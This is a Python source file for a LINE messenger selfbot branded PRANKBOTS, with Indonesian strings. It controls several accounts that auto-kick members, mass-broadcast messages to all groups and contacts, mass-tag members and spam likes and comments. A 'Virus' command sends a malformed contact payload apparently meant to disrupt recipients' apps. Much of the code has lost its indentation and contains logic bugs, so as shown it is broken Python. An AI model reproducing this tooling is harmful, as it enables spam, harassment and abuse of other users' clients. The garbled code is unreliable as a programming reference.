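# `wait` holds the selfbot's runtime feature toggles and per-group state; the chat
# commands handled in bot() below flip these flags while the bot is running.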
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
settings = {
"simiSimi":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
cctv = {
"cyduk":{},
"point":{},
"sidermem":{}
}
setTime = wait2['setTime']
mulai = time.time()
def cms(string, commands): # matches a command with any accepted prefix: /XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
    tex = ["+","@","/",">",";","^","%","$","サテラ:"]
    for texX in tex:
        for command in commands:
            if string == texX + command:
                return True
    return False
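# Usage sketch (hypothetical command list): the prefix is required, so
# cms("/kick", ["kick"]) returns True while a bare cms("kick", ["kick"]) returns False.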
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def download_page(url):
    version = (3,0)
    cur_version = sys.version_info
    if cur_version >= version: # Python 3.0 or above
        import urllib.request # urllib library for fetching web pages
        try:
            headers = {}
            headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
            req = urllib.request.Request(url, headers = headers)
            resp = urllib.request.urlopen(req)
            respData = str(resp.read())
            return respData
        except Exception as e:
            print(str(e))
    else: # Python 2.x
        import urllib2
        try:
            headers = {}
            headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
            req = urllib2.Request(url, headers = headers)
            response = urllib2.urlopen(req)
            page = response.read()
            return page
        except:
            return "Page Not found"
#Finding 'Next Image' from the given raw page
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1: #If no links are found then give an error!
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"',start_line+90)
end_content = s.find(',"ow"',start_content-90)
content_raw = str(s[start_content+6:end_content-1])
return content_raw, end_content
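# Note: _images_get_next_item string-matches the 'rg_di'/'rg_meta' markers in raw
# Google Images HTML; this is brittle and stops matching silently whenever Google
# changes its result markup.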
#Getting all links with the help of '_images_get_next_item'
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item) #Append all the links in the list named 'Links'
time.sleep(0.1) #Timer could be used to slow down the request for image downloads
page = page[end_content:]
return items
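# Usage sketch (hypothetical query), chaining the two scraper helpers above:
# links = _images_get_all_items(download_page("https://www.google.com/search?q=cat&tbm=isch"))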
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
return image
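# Note: upload_tempimage reads the module-level globals `album` and `image_path`,
# which must be defined elsewhere before it is called; neither is defined above.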
def updateProfilePicture(self, path):
file=open(path, 'rb')
files = {
'file': file
}
params = {
'name': 'media',
'type': 'image',
'oid': self.profile.mid,
'ver': '1.0',
}
data={
'params': json.dumps(params)
}
r = self.server.postContent(self.server.LINE_OBS_DOMAIN + '/talk/p/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Update profile picture failure.')
return True
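# updateProfilePicture posts the file to the LINE object-storage (obs) endpoint;
# the service answers 201 on success, so any other status is treated as failure.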
def sendVideo(self, to_, path):
M = Message(to=to_, text=None, contentType = 2)
M.contentMetadata = None
M.contentPreview = None
M2 = self.Talk.client.sendMessage(0,M)
M_id = M2.id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'video',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
#print r
if r.status_code != 201:
raise Exception('Upload video failure.')
return True
def sendVideoWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
        with open(path, 'wb') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download video failure.')
try:
self.sendVideo(to_, path)
except Exception as e:
        raise e
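# Caveat: the temp path above uses randint(0, 9), so only ten distinct file names
# exist and concurrent downloads can clobber one another; tempfile.mkstemp would
# avoid the collision.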
def sendAudioWithUrl(self, to_, url):
    path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
    r = requests.get(url, stream=True)
    if r.status_code == 200:
        with open(path, 'wb') as f:
            shutil.copyfileobj(r.raw, f)
    else:
        raise Exception('Download audio failure.')
    try:
        self.sendAudio(to_, path)
    except Exception as e:
        raise e
def sendAudio(self, to_, path):
    M = Message(to=to_, text=None, contentType = 3)
    M.contentMetadata = None
    M.contentPreview = None
    M2 = self.Talk.client.sendMessage(0,M)
    M_id = M2.id
    files = {
        'file': open(path, 'rb'),
    }
    params = {
        'name': 'media',
        'oid': M_id,
        'size': len(open(path, 'rb').read()),
        'type': 'audio',
        'ver': '1.0',
    }
    data = {
        'params': json.dumps(params)
    }
    r = self.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
    if r.status_code != 201:
        raise Exception('Upload audio failure.')
    return True
def sendMessage(to, text, contentMetadata={}, contentType=0):
    # builds a Message and bumps a per-recipient request counter; note that as
    # written nothing dispatches `mes`, so callers must send it themselves
    mes = Message()
    mes.to, mes.from_ = to, profile.mid
    mes.text = text
    mes.contentType, mes.contentMetadata = contentType, contentMetadata
    if to not in messageReq:
        messageReq[to] = -1
    messageReq[to] += 1
def fullwidth(text):
    '''converts a regular string to Unicode Fullwidth
    Preconditions: text, a string'''
    # note: str.maketrans with two string arguments is Python 3 behaviour; under
    # Python 2 the equivalent lives in the string module
    translator = ''
    translator = translator.maketrans('0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&()*+,-./:;<=>?@[]^_`{|}~' , '０１２３４５６７８９ａｂｃｄｅｆｇｈｉｊｋｌｍｎｏｐｑｒｓｔｕｖｗｘｙｚＡＢＣＤＥＦＧＨＩＪＫＬＭＮＯＰＱＲＳＴＵＶＷＸＹＺ！゛＃＄％＆（）＊＋、ー。／：；〈＝〉？＠［］＾＿‘｛｜｝～')
    return text.translate(translator)
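# Example (Python 3 semantics): fullwidth("abc 123!") -> "ａｂｃ １２３！";
# characters outside the mapping, such as the space, pass through unchanged.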
def sendImage(self, to_, path):
M = Message(to=to_, text=None, contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M2 = self._client.sendMessage(0,M)
M_id = M2.id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://obs-sg.line-apps.com/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
return True
def sendImageWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
        with open(path, 'wb') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except:
try:
self.sendImage(to_, path)
except Exception as e:
raise e
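# Note: sendImageWithURL retries the upload once (the nested try) before
# re-raising the exception from the second attempt.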
def NOTIFIED_READ_MESSAGE(op):
try:
if op.param1 in wait2['readPoint']:
Name = acil.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name
wait2['ROM'][op.param1][op.param2] = "・" + Name
else:
pass
except:
pass
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
return '%02d Jam %02d Menit %02d Detik' % (hours, mins, secs)
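# Example: waktu(3723) -> '01 Jam 02 Menit 03 Detik'
# (elapsed seconds formatted as hours/minutes/seconds; labels are Indonesian).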
def bot(op):
try:
if op.type == 0:
return
if op.type == 13:
if mid in op.param3:
G = acil.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
acil.rejectGroupInvitation(op.param1)
else:
acil.acceptGroupInvitation(op.param1)
G.preventJoinByTicket = False
acil.updateGroup(G)
Ticket = acil.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
acil.updateGroup(G)
else:
acil.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
acil.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace(" ",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
random.choice(KAC).kickoutFromGroup(op.param1, matched_list)
if op.type == 19:
if mid in op.param3:
wait["blacklist"][op.param2] = True
if op.type == 22:
if wait["leaveRoom"] == True:
acil.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
acil.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == mid:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
acil.acceptGroupInvitationByTicket(list_[1],list_[2])
G = acil.getGroup(list_[1])
G.preventJoinByTicket = True
acil.updateGroup(G)
except:
acil.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
acil.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
acil.like(url[25:58], url[66:], likeType=1001)
ki.like(url[25:58], url[66:], likeType=1001)
ki2.like(url[25:58], url[66:], likeType=1001)
ki3.like(url[25:58], url[66:], likeType=1001)
ki4.like(url[25:58], url[66:], likeType=1001)
ki5.like(url[25:58], url[66:], likeType=1001)
acil.comment(url[25:58], url[66:], wait["comment1"])
ki.comment(url[25:58], url[66:], wait["comment1"])
ki2.comment(url[25:58], url[66:], wait["comment1"])
ki3.comment(url[25:58], url[66:], wait["comment1"])
ki4.comment(url[25:58], url[66:], wait["comment1"])
ki5.comment(url[25:58], url[66:], wait["comment1"])
ki.comment(url[25:58], url[66:], wait["comment1"])
ki2.comment(url[25:58], url[66:], wait["comment1"])
ki3.comment(url[25:58], url[66:], wait["comment1"])
ki4.comment(url[25:58], url[66:], wait["comment1"])
ki5.comment(url[25:58], url[66:], wait["comment1"])
#-----------------------------------------------
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = acil.getGroup(op.param1)
except:
try:
                            G = ki.getGroup(op.param1)
except:
try:
G = ki2.getGroup(op.param1)
except:
try:
G = ki3.getGroup(op.param1)
except:
try:
G = ki4.getGroup(op.param1)
except:
try:
G = ki5.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
acil.updateGroup(G)
except:
try:
ki.updateGroup(G)
except:
try:
ki2.updateGroup(G)
except:
try:
ki3.updateGroup(G)
except:
try:
ki4.updateGroup(G)
except:
try:
ki5.updateGroup(G)
except:
pass
if op.param2 in Bots:
pass
else:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ki2.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ki3.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ki4.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ki5.kickoutFromGroup(op.param1,[op.param2])
except:
pass
if op.type == 26:
msg = op.message
if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
ki.sendText(msg.to,text)
if op.type == 26:
msg = op.message
if msg.to in settings["simiSimi"]:
if settings["simiSimi"][msg.to] == True:
if msg.text is not None:
text = msg.text
r = requests.get("http://api.ntcorp.us/chatbot/v1/?text=" + text.replace(" ","+") + "&key=beta1.nt")
data = r.text
data = json.loads(data)
if data['status'] == 200:
if data['result']['result'] == 100:
acil.sendText(msg.to, "🤠" + data['result']['response'].encode('utf-8'))
if "MENTION" in msg.contentMetadata.keys() != None:
if wait['detectMention'] == True:
contact = acil.getContact(msg.from_)
cName = contact.pictureStatus
balas = ["http://dl.profile.line-cdn.net/" + cName]
ret_ = random.choice(balas)
mention = ast.literal_eval(msg.contentMetadata["MENTION"])
mentionees = mention["MENTIONEES"]
for mention in mentionees:
if mention["M"] in mid:
acil.sendImageWithURL(msg.to,ret_)
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
acil.sendMessage(msg)
acil.sendText(msg.to, wait["tagme"])
break
if "MENTION" in msg.contentMetadata.keys() != None:
if wait['stickerMention'] == True:
mention = ast.literal_eval(msg.contentMetadata["MENTION"])
mentionees = mention["MENTIONEES"]
for mention in mentionees:
if mention["M"] in mid:
                            msg.contentType = 7
                            msg.text = ''
                            msg.contentMetadata = {
                                'STKPKGID': '1', # sticker sent when the bot is tagged
                                'STKTXT': '[]',
                                'STKVER': '100',
                                'STKID': '110'
                            }
acil.sendText(msg.to, wait["tagme"])
acil.sendMessage(msg)
break
            if msg.contentMetadata is not None and 'MENTION' in msg.contentMetadata:
if wait["kickMention"] == True:
contact = acil.getContact(msg.from_)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in mid:
acil.sendText(msg.to,"don't tag me")
acil.kickoutFromGroup(msg.to,[msg.from_])
break
if msg.contentType == 13:
if wait['invite'] == True:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = acil.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
acil.sendText(msg.to, _name + " Berada DiGrup Ini")
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
acil.findAndAddContactsByMid(target)
acil.inviteIntoGroup(msg.to,[target])
acil.sendText(msg.to,"Invite " + _name)
wait['invite'] = False
break
except:
acil.sendText(msg.to,"Error")
wait['invite'] = False
break
if wait["alwayRead"] == True:
if msg.toType == 0:
acil.sendChatChecked(msg.from_,msg.id)
else:
acil.sendChatChecked(msg.to,msg.id)
# if wait["Removechat"] == True:
# if msg.toType == 0:
# acil.removeAllMessages(op.param2)
# else:
# acil.removeAllMessages(op.param2)
if msg.text in ["Botallbye"]: #asist akan keluar dari smua grup
if msg.from_ in PRANKBOT:
gid = ki.getGroupIdsJoined()
gid = ki2.getGroupIdsJoined()
gid = ki3.getGroupIdsJoined()
gid = ki4.getGroupIdsJoined()
gid = ki5.getGroupIdsJoined()
for i in gid:
ki.leaveGroup(i)
ki2.leaveGroup(i)
ki3.leaveGroup(i)
ki4.leaveGroup(i)
ki5.leaveGroup(i)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nBots Dipaksa Keluar oleh selfbot...!!!\nMakasih...!!!")
else:
acil.sendText(msg.to,"He declined all invitations")
#--------------------------
#------------------------------------------------------------
if msg.text in ["Invite:user"]:
if msg.from_ in PRANKBOT:
wait["invite"] = True
acil.sendText(msg.to,"send contact 😉")
#------------------------------------------------------------
if msg.text in ["Leaveallgroup"]: #selfbot akan keluar dari semua grup
if msg.from_ in PRANKBOT:
gid = acil.getGroupIdsJoined()
for i in gid:
acil.leaveGroup(i)
if wait["lang"] == "JP":
acil.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nBots Dipaksa Keluar oleh selfbot...!!!\nMakasih...!!!")
else:
acil.sendText(msg.to,"He declined all invitations")
#----------------------------------------------
if "Sendgrup " in msg.text:
                if msg.from_ in PRANKBOT: # broadcast the text to every group the selfbot has joined
bctxt = msg.text.replace("Sendgrup ", "")
n = acil.getGroupIdsJoined()
for manusia in n:
acil.sendText(manusia, (bctxt))
if "Sendcontact " in msg.text:
if msg.from_ in PRANKBOT: #SEMUA BOT AKAN BROADCAST KE SEMUA KONTAKNYA
bctxt = msg.text.replace("Sendcontact ", "")
t = ki.getAllContactIds()
t = ki2.getAllContactIds()
t = ki3.getAllContactIds()
t = ki4.getAllContactIds()
t = ki5.getAllContactIds()
for manusia in t:
ki.sendText(manusia,(bctxt))
ki2.sendText(manusia,(bctxt))
ki3.sendText(manusia,(bctxt))
ki4.sendText(manusia,(bctxt))
ki5.sendText(manusia,(bctxt))
if "Sendpm " in msg.text:
                if msg.from_ in PRANKBOT: # the selfbot broadcasts to all of its own friends
bctxt = msg.text.replace("Sendpm ", "")
t = acil.getAllContactIds()
for manusia in t:
acil.sendText(manusia, (bctxt))
if "Virus" in msg.text:
if msg.from_ in PRANKBOT:
msg.contentType = 13
msg.contentMetadata = {'mid': "BEBAS,'"}
acil.sendMessage(msg)
if "Youinfo" in msg.text:
if msg.from_ in PRANKBOT:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = acil.getContact(key1)
cu = acil.channel.getCover(key1)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
acil.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
acil.sendText(msg.to,"Profile Picture " + contact.displayName)
acil.sendImageWithURL(msg.to,image)
acil.sendText(msg.to,"Cover " + contact.displayName)
acil.sendImageWithURL(msg.to,path)
except:
pass
if "Tagall" in msg.text:
if msg.from_ in PRANKBOT:
group = acil.getGroup(msg.to)
                    k = len(group.members)//200 # one mention message per 200 members
                    for j in xrange(k+1):
msg = Message(to=msg.to)
txt = u''
s=0
d=[]
for i in group.members[j*200 : (j+1)*200]:
d.append({"S":str(s), "E" :str(s+8), "M":i.mid})
s += 9
txt += u'@Krampus\n'
msg.text = txt
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
ki.sendMessage(msg)
if "Github " in msg.text:
if msg.from_ in PRANKBOT:
a = msg.text.replace("Github ","")
b = urllib.quote(a)
acil.sendText(msg.to,"「 Searching 」\n" "Type: GitHub Search\nStatus: Processing...")
acil.sendText(msg.to, "Title: " + a + "\nLink: https://github.com/search?utf8=✓&q="+b)
if "Playstore " in msg.text:
tob = msg.text.replace("Playstore ","")
acil.sendText(msg.to,"Please wait...")
acil.sendText(msg.to,"Title : "+tob+"\nSource : Google Play\nLinknya : https://play.google.com/store/search?q=" + tob)
acil.sendText(msg.to,"This is link aplication")
if "Wikipedia " in msg.text:
if msg.from_ in PRANKBOT:
try:
wiki = msg.text.replace("Wikipedia ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
acil.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
acil.sendText(msg.to, pesan)
except Exception as e:
acil.sendText(msg.to, str(e))
if "Twitter " in msg.text:
if msg.from_ in PRANKBOT:
a = msg.text.replace("Twitter ","")
b = urllib.quote(a)
acil.sendText(msg.to,"「 Searching 」\n" "Type:Search Info\nStatus: Processing")
acil.sendText(msg.to, "https://www.twitter.com" + b)
acil.sendText(msg.to,"「 Searching 」\n" "Type:Search Info\nStatus: Success")
if "Smule " in msg.text:
if msg.from_ in PRANKBOT:
a = msg.text.replace("Smule ","")
b = urllib.quote(a)
acil.sendText(msg.to,"Searching to id smule..")
acil.sendText(msg.to, "Nama: "+b+"\nId smule: http://smule.com/" +b)
if "Google " in msg.text:
if msg.from_ in PRANKBOT:
a = msg.text.replace("Google ","")
b = urllib.quote(a)
acil.sendText(msg.to,"Searching google..")
acil.sendText(msg.to, "Search: "+b+"\nsuccess: http://google.com/" +b)
if "Xvideos " in msg.text:
if msg.from_ in PRANKBOT:
a = msg.text.replace("Xvideos ","")
b = urllib.quote(a)
acil.sendText(msg.to,"Searching ....\n" "Type:Search Xvideos\nStatus: Processing")
acil.sendText(msg.to, "{ Xvideos search page }\n\nTitle: "+b+"\nSource : Xvideos\nhttp://xvideos.com/?k=" +b)
if "Picturl @" in msg.text:
if msg.from_ in PRANKBOT:
print "[Command]dp executing"
_name = msg.text.replace("Picturl @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
acil.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
if "Coverurl @" in msg.text:
if msg.from_ in PRANKBOT:
print "[Command]cover executing"
_name = msg.text.replace("Coverurl @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
cu = acil.channel.getCover(target)
path = str(cu)
acil.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
if "Setauto" == msg.text:
if msg.from_ in PRANKBOT:
acil.sendText(msg.to,helpFun)
if "Help" == msg.text:
if msg.from_ in PRANKBOT:
if wait["lang"] == "JP":
acil.sendText(msg.to,helpMessage1)
msg.contentType = 13
acil.sendText(msg.to,"MINAT PESAN VPS DAN SELFBOT SILAHKAN ADD CREATOR PRANKBOTS")
msg.contentMetadata = {'mid':'ufce863f62f40706c01fa4a3c3c4cb096'}
acil.sendMessage(msg)
else:
acil.sendText(msg.to,helpMessage1)
msg.contentType = 13
acil.sendText(msg.to,"MINAT PESAN VPS DAN SELFBOT SILAHKAN ADD CREATOR PRANKBOTS")
msg.contentMetadata = {'mid':'ufce863f62f40706c01fa4a3c3c4cb096'}
acil.sendMessage(msg)
if "Media" == msg.text:
if msg.from_ in PRANKBOT:
if wait["lang"] == "JP":
acil.sendText(msg.to,helpMedia)
msg.contentType = 13
msg.contentMetadata = {'mid':'ufce863f62f40706c01fa4a3c3c4cb096'}
acil.sendMessage(msg)
acil.sendText(msg.to,"MINAT PESAN VPS DAN SELFBOT SILAHKAN ADD CREATOR PRANKBOTS")
else:
acil.sendText(msg.to,helpMedia)
msg.contentType = 13
msg.contentMetadata = {'mid':'ufce863f62f40706c01fa4a3c3c4cb096'}
acil.sendMessage(msg)
acil.sendText(msg.to,"MINAT PESAN VPS DAN SELFBOT SILAHKAN ADD CREATOR PRANKBOTS")
if "Helpbots" == msg.text:
if msg.from_ in PRANKBOT:
if wait["lang"] == "JP":
ki.sendText(msg.to,helpself)
msg.contentType = 13
msg.contentMetadata = {'mid':'ufce863f62f40706c01fa4a3c3c4cb096'}
acil.sendMessage(msg)
acil.sendText(msg.to,"MINAT PESAN VPS DAN SELFBOT SILAHKAN ADD CREATOR PRANKBOTS")
else:
acil.sendText(msg.to,helpself)
msg.contentType = 13
msg.contentMetadata = {'mid':'ufce863f62f40706c01fa4a3c3c4cb096'}
acil.sendMessage(msg)
acil.sendText(msg.to,"MINAT PESAN VPS DAN SELFBOT SILAHKAN ADD CREATOR PRANKBOTS")
if "Settings" == msg.text:
if msg.from_ in PRANKBOT:
if wait["lang"] == "JP":
acil.sendText(msg.to,helpset)
msg.contentType = 13
msg.contentMetadata = {'mid':'ufce863f62f40706c01fa4a3c3c4cb096'}
acil.sendMessage(msg)
acil.sendText(msg.to,"MINAT PESAN VPS DAN SELFBOT SILAHKAN ADD CREATOR PRANKBOTS")
else:
acil.sendText(msg.to,helpset)
msg.contentType = 13
msg.contentMetadata = {'mid':'ufce863f62f40706c01fa4a3c3c4cb096'}
acil.sendMessage(msg)
acil.sendText(msg.to,"MINAT PESAN VPS DAN SELFBOT SILAHKAN ADD CREATOR PRANKBOTS")
if "Me" == msg.text:
if msg.from_ in PRANKBOT:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
acil.sendMessage(msg)
h = acil.getContact(msg.from_)
acil.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
if "Respon" == msg.text:
if msg.from_ in PRANKBOT:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
ki2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
ki3.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
ki4.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
ki5.sendMessage(msg)
ki.sendText(msg.to,"AMAN TERKENDALI KOMANDAN 👮")
if "Set" == msg.text:
if msg.from_ in PRANKBOT:
md = "╔▬▬℘ґ∂ηк в❍тs▬▬╗\n║▬▬▬℘▬▬в▬▬▬║\n"
if wait["likeOn"] == True: md+="║☆║Like:ON➡️📱\n"
else: md+="║☆║Like:OFF➡️📴\n"
if wait["wcOn"] == True: md+="║☆║Welcome:ON➡️📱\n"
else: md+="║☆║Welcome:OFF➡️📴\n"
if wait["leftOn"] == True: md+="║☆║Left:ON➡️📱\n"
else: md+="║☆║Left:OFF➡️📴\n"
if wait["detectMention"] == True: md+="║☆║Respon:ON➡️📱\n"
else: md +="║☆║Respon:OFF➡️📴\n"
if wait["stickerMention"] == True: md+="║☆║Stickertag:ON➡️📱\n"
else: md +="║☆║Stickertag:OFF➡️📴\n"
if settings["simiSimi"] == True: md+="║☆║Simisimi:ON➡️📱\n"
else: md+="║☆║Simisimi:OFF➡️📴\n"
if wait["alwayRead"] == True: md+="║☆║Auto read:ON➡️📱\n"
else: md+="║☆║Auto read:OFF➡️📴\n"
if wait["Sider"] == True: md+="║☆║Sider:ON➡️📱\n"
else: md+="║☆║Sider:OFF➡️📴\n"
if wait["kickMention"] == True: md+="║☆║Notag:ON➡️📱\n"
else:md+="║☆║Notag:OFF➡️📴\n"
if wait["contact"] == True: md+="║☆║Contact:ON➡️📱\n"
else: md+="║☆║Contact:OFF➡️📴\n"
if wait["autoJoin"] == True: md+="║☆║Join:ON➡️📱\n"
else: md +="║☆║Join:OFF➡️📴\n"
if wait["autoCancel"]["on"] == True:md+="║☆║Cancel:" + str(wait["autoCancel"]["members"]) + "➡️📱\n"
else: md+= "║☆║Cancel:OFF➡️📴\n"
if wait["leaveRoom"] == True: md+="║☆║Leave:ON➡️📱\n"
else: md+="║☆║Leave:OFF➡️📴\n"
if wait["timeline"] == True: md+="║☆║Share:ON➡️📱\n"
else:md+="║☆║Share:OFF➡️📴\n"
if wait["autoAdd"] == True: md+="║☆║Add:ON➡️📱\n"
else:md+="║☆║Add:OFF➡️??\n"
if wait["commentOn"] == True: md+="║☆║Com:ON➡️📱\n"
else:md+="║☆║Com:OFF➡️📴\n║▬║❨◄▬▬▬►❩\n║☆║◄═PROTECTION═►\n║▬║▬PRANKBOTS▬╣\n"
if wait["protect"] == True: md+="║☆║Pro:ON➡️📱\n"
else:md+="║☆║Pro:OFF➡️📴\n"
if wait["linkprotect"] == True: md+="║☆║ProtectQr:ON➡️📱\n"
else:md+="║☆║ProtectQr:OFF➡️📴\n"
if wait["inviteprotect"] == True: md+="║☆║Proinvite:ON➡️📱\n"
else:md+="║☆║Proinvite:OFF➡️📴\n"
if wait["cancelprotect"] == True: md+"║☆║Procancel:ON➡️📱\n"
else:md+="║☆║Procancel:OFF➡️📴\n"
if wait["pname"] == True: md+="║☆║Namelock:ON➡️📱\n"
else: md+="║☆║Namelock:OFF➡️📴\n"
acil.sendText(msg.to,md + "║▬▬▬℘▬▬в▬▬▬║\n╚▬▬℘ґ∂ηк в❍тs▬▬╝")
if "Sider:on" in msg.text:
if msg.from_ in PRANKBOT:
del cctv['point'][msg.to]
del cctv['sidermem'][msg.to]
del cctv['cyduk'][msg.to]
pass
cctv['cyduk'][msg.to]=True
wait["Sider"] = True
acil.sendText(msg.to,"Siap On Cek Sider")
if "Sider:off" in msg.text:
if msg.from_ in PRANKBOT:
cctv['cyduk'][msg.to]=False
wait["Sider"] = False
acil.sendText(msg.to, "Cek Sider Off")
if msg.text in ["Allprotect:on"]:
if msg.from_ in PRANKBOT:
if wait["protect"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Protection Enable ✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["protect"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"Protection Enable✔")
else:
acil.sendText(msg.to,"It is already On ✔")
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Link Protection Enable ✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"Link Protect Enable")
else:
acil.sendText(msg.to,"It is already On ô€¨")
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Invite Protect Enable ✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"Invite Protect Enable")
else:
acil.sendText(msg.to,"It is already On ¨")
                    if msg.to in wait['pname']:
                        acil.sendText(msg.to,"ALREADY ON")
                    else:
                        acil.sendText(msg.to,"TURN ON")
                    wait['pname'][msg.to] = True
                    wait['pro_name'][msg.to] = acil.getGroup(msg.to).name
